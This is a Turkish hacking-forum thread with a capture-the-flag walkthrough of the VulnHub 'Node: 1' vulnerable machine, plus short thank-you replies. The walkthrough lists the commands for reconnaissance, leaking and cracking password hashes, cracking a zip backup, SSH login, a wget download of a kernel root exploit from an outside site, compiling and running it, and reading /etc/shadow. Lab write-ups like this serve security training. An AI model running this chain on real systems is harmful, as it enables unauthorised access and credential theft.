THT DUYURU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Node 1 Açıklı Makine Çözümü / ch_arli41

ch_arli41 - ait Kullanıcı Resmi (Avatar)
Red Team Lideri
Üyelik tarihi:
07/2009
Mesajlar:
1.004
Konular:
72
Teşekkür (Etti):
695
Teşekkür (Aldı):
717
Ticaret:
(0) %
02-09-2018 23:56
#1
Node 1 Açıklı Makine Çözümü / ch_arli41
Merhaba arkadaşlar.
Bu konumda sizlere Node:1 orta seviye açıklı makine’nin çözümünü anlatacam.Başlamadan kısa bilgi vereyim.Açık bulunan sistem user ve root flags(bayraklarını) bulmamızı istiyorlar.Ben burda sistemin şifrelerini almayı, şifrelerin kırma yöntemlerini ve sistemde root yetkisine ulaşmayı gösterecem.Sizlerden isteğim root flag(bayrağını) bulmanız.Bulduğunuz bayrağı bana iletirseniz konuya ekliyecem.


Node:1 Makinesini Aşağıdaki Linkten İndirebilirsiniz:


https://www.vulnhub.com/entry/node-1,252/#


Sistem kurulumunu ve ayarları yapmak için burdaki konuyu inceleye bilirsiniz.


https://www.turkhackteam.org/siber-g...ch_arli41.html








Kod:
netdiscover

Bu komut bize modeme bağlı cihazları listeliyor.Ordan ip’yi kopyalıyoruz.







Kod:
nmap ipadresi

Bu komut ile portlara bakıyoruz.22 ve 3000 portunu gösteriyor bize 3000 portunu ipadres port numarası olarak tarayıcıma yazıyorum.







Evet karşıma web sayfası geldi.LOGIN kısmına tıklıyorum ve karşıma giriş sayfası çıktı.Şimdiki hedefim giriş bilgilerini bulmak.Bunu için Burp Suite programını kullanacam.







Firefox tarayıcımızın ayarlarını yapıyoruz.Advanced kısmına geliyoruz ve Network'a tıklıyoruz.HTTP kısmına 127.0.0.1 port kısmına 8080 yazıyoruz resimdeki gibi.





Tarayıcıda sayfayı yenile yaptığımızda burp suit proğramımıza geldi.Forward kısmına 2 yada 3 sefer tıklıyoruz.Target bölümüne geçiyoruz.







Burdaki linke sağ tıklıyoruz ve Spider this host'a tıklıyoruz.Bu şekilde brup suit proğramı tarama yapıp bütün detayları bize verecektir.








Resimde gördüğünüz gibi /api/users/ yoluna gidiyorum ve java script link yolunu kopyalıyorum.









Giriş bilgilerine ulaştık.Bilgiler şifrelendiği içi kırmamız gerekecek ilk önce şifreleme türünü bulalım.








hash-identifier

Şifreleme türünü öğrenmek için hash-identifier scriptini kullanıyoruz.Sha-256 ile şifrelendiğini öğrendik devam ediyoruz.







Kod:
john --show --format=raw-sha256 /sifreler.txt

Ben burda John the rippe şifre kırma yazılımını kullandım siz isterseniz diğer şifre kırma araçlarını kullana bilirsiniz.Burda sifreler.txt dosyasının içine kırılacak sifreleri yazıyoruz ve john the rippe programı kendi içindeki wordlist'den yararlanarak şifreleri kırıyor.










Admin panelimize giriş yapıyoruz ve backup dosyası denk geliyor anlaşılan bu iş uzuyacak gibi ama bıkmadan yolumuza devam ediyoruz.Backup dosyasını indiriyoruz.Dosyayı incelememizin sonucunda base64 ile encrypt edildiğini öğrendik.Bu dosyayı decrypt etmemiz gerekiyor.






Kod:
cat myplace.backup | base64 -d > ch_arli41
Yukardaki komut ile backup dosyasını decrypt ediyoruz ve karşımıza zip dosyası çıkıyor.Zip dosyasının içindekileri çıkarmak istediğimizde bizden şifre istiyor.







Zip dosyasını kırmak için fcrackzip yazılımını kullanacaz.Konsola fcrackzip yazıp komutların detayına baka bilirsiniz.







Kod:
fcrackzip -u -D -p wordlist.txt ch_arli41


Bu komut ile zip dosyamızın şifresini kırıyoruz.Burda dikkat edilmesi gereken nokta eğer wordlist'in içinde doğru şifre yoksa kırılmaz bunun için başka wordlist denememiz gereke bilir.








Zip dosyasından dosyaları çıkarttık./var/www/myplace dosya yoluna gidiyoruz apps.js dosyasını not defteri yada metin düzenleyiciyle açıyoruz.Ssh giriş bilgilerini aldık sisteme bağlana biliriz.









Kod:
ssh mark@ipadresi
Bu komut ile sisteme bağlandık.Şimdik sistemi inceliyelim biraz.






Resimdeki gibi sistemin bilgilerini aldım.cat /etc/shadow komutunu yazdığımda yetkimin olmadığını gördüm.Sistemde root yetkisine kendimi yükseltmem gerekecek bunun için 4.4.0 linux local root exploiti'ni aratıyorum googleden ve searchsploit kullanarak.





Kod:
cd /tmp
Kod:
wget http://cyseclabs.com/pub/upstream44.c
cd komutu ile dizin değiştiriyorum.wget komutunu kullanarak c dilinde yazılmış exploiti bulunduğum dizine indiriyorum.







gcc dosya-adi.c -o ch_arli41


Bu komut ile c dilinde yazılmış exploiti derliyorum.






Kod:
./ch_arli41

Yukardaki komut ile exploiti çalıştırıyoruz.Siz orda hangi ismi verdiyseniz o isimi yazacaksınız.






Kod:
cd ..
cat /etc/shadow

Resimde gördüğüz gibi cd komutu ile ana dizine geçiş yaptık cat komutunu kullanarak bilgileri ekrana yansıttık.



Benim anlatımım buraya kadar konunun başında dediğim gibi root bilgisini sizlerden bekliyorum.
Bir sonraki konuda görüşmek üzere..
---------------------
Konu ch_arli41 tarafından (03-09-2018 00:02 Saat 00:02 ) değiştirilmiştir.
'Creative - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
03/2017
Mesajlar:
3.135
Konular:
94
Teşekkür (Etti):
222
Teşekkür (Aldı):
1051
Ticaret:
(0) %
02-09-2018 23:59
#2
Elinize Sağlık Güzel Konu
--------------------- ‘’ Ve Orhan Veli Ceketsiz Öldü.’’


M3m0ry Teşekkür etti.
SeNZeRo - ait Kullanıcı Resmi (Avatar)
Süper Moderatör
Üyelik tarihi:
09/2016
Mesajlar:
5.017
Konular:
463
Teşekkür (Etti):
83
Teşekkür (Aldı):
1542
Ticaret:
(0) %
03-09-2018 00:02
#3
Eline emeğine sağlık.
theokeleS - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
05/2018
Mesajlar:
1.358
Konular:
31
Teşekkür (Etti):
68
Teşekkür (Aldı):
356
Ticaret:
(0) %
03-09-2018 00:05
#4
Elinize sağlık
'Taipan - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2015
Mesajlar:
3.874
Konular:
87
Teşekkür (Etti):
935
Teşekkür (Aldı):
1405
Ticaret:
(0) %
03-09-2018 00:18
#5
Eline sağlık güzel, beklenen konulardan
---------------------
Man In The Middle

#Kalbimizdesin Solo-Türk


ch_arli41 Teşekkür etti.
ATABÖRÜ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Nereden:
Ötüken
Yaş:
83
Mesajlar:
3.370
Konular:
303
Teşekkür (Etti):
950
Teşekkür (Aldı):
911
Ticaret:
(0) %
03-09-2018 00:49
#6
Ellerine emeğine farene sağlık abi hak etmiştin
---------------------
Ey Türk milleti! Kendine dön! Sen yükseltmiş Bilge Kağan'ına, hür ve müstakil ülkene karşı hata ettin, kötü duruma düşürdün. Milletin adı, sanı yok olmasın diye Türk milleti için gece uyumadım, gündüz oturmadım. Kardeşim Kül Tegin ve iki şad ile ölesiye bitesiye çalıştım.
oldnco - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
09/2017
Yaş:
30
Mesajlar:
1.524
Konular:
43
Teşekkür (Etti):
639
Teşekkür (Aldı):
368
Ticaret:
(0) %
03-09-2018 00:59
#7
Elinize emeğinize sağlık
--------------------- 💫 Alles wird sehr schön werden

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler